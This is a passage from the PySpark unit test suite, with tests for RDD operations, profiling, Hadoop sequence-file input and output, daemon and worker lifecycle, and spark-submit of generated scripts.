self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
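# The stage counts above reflect narrow vs. wide dependencies: joining or cogrouping two
# copies of the already-partitioned RDD adds no extra shuffle (2 stages), while mixing in
# the unpartitioned rdd adds one more shuffle stage (3 stages).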
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
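# Outside of this harness, a minimal profiling session might look like the sketch below
# (illustrative only, assuming a local master):
#   conf = SparkConf().set("spark.python.profile", "true")
#   sc = SparkContext("local[4]", "profiling-demo", conf=conf)
#   sc.parallelize(range(100)).count()
#   sc.show_profiles()          # print per-RDD profile stats to stdout
#   sc.dump_profiles("/tmp")    # or write rdd_<id>.pstats files to a directory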
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
oldconf = {"mapreduce.input.fileinputformat.inputdir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
newconf = {"mapreduce.input.fileinputformat.inputdir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertTrue(v in em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertTrue(v in dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertTrue(v in dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.Text",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapreduce.input.fileinputformat.inputdir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/reserialize/newdataset"
}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shut down the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
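# These tests drive daemon.py directly over its socket protocol: the daemon writes its
# listening port to stdout (read with read_int above), and, as the comment in connect()
# notes, a split index of -1 (0xFFFFFFFF) asks the worker that accepted the connection
# to shut down.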
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertFalse(t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
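# Illustrative example of the margin convention used by the tests below: content such as
#     """
#     |from pyspark import SparkContext
#     |sc = SparkContext()
#     """
# is written to disk with the leading spaces and the '|' margin stripped from every line.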
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def create_spark_package(self, artifact_name):
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
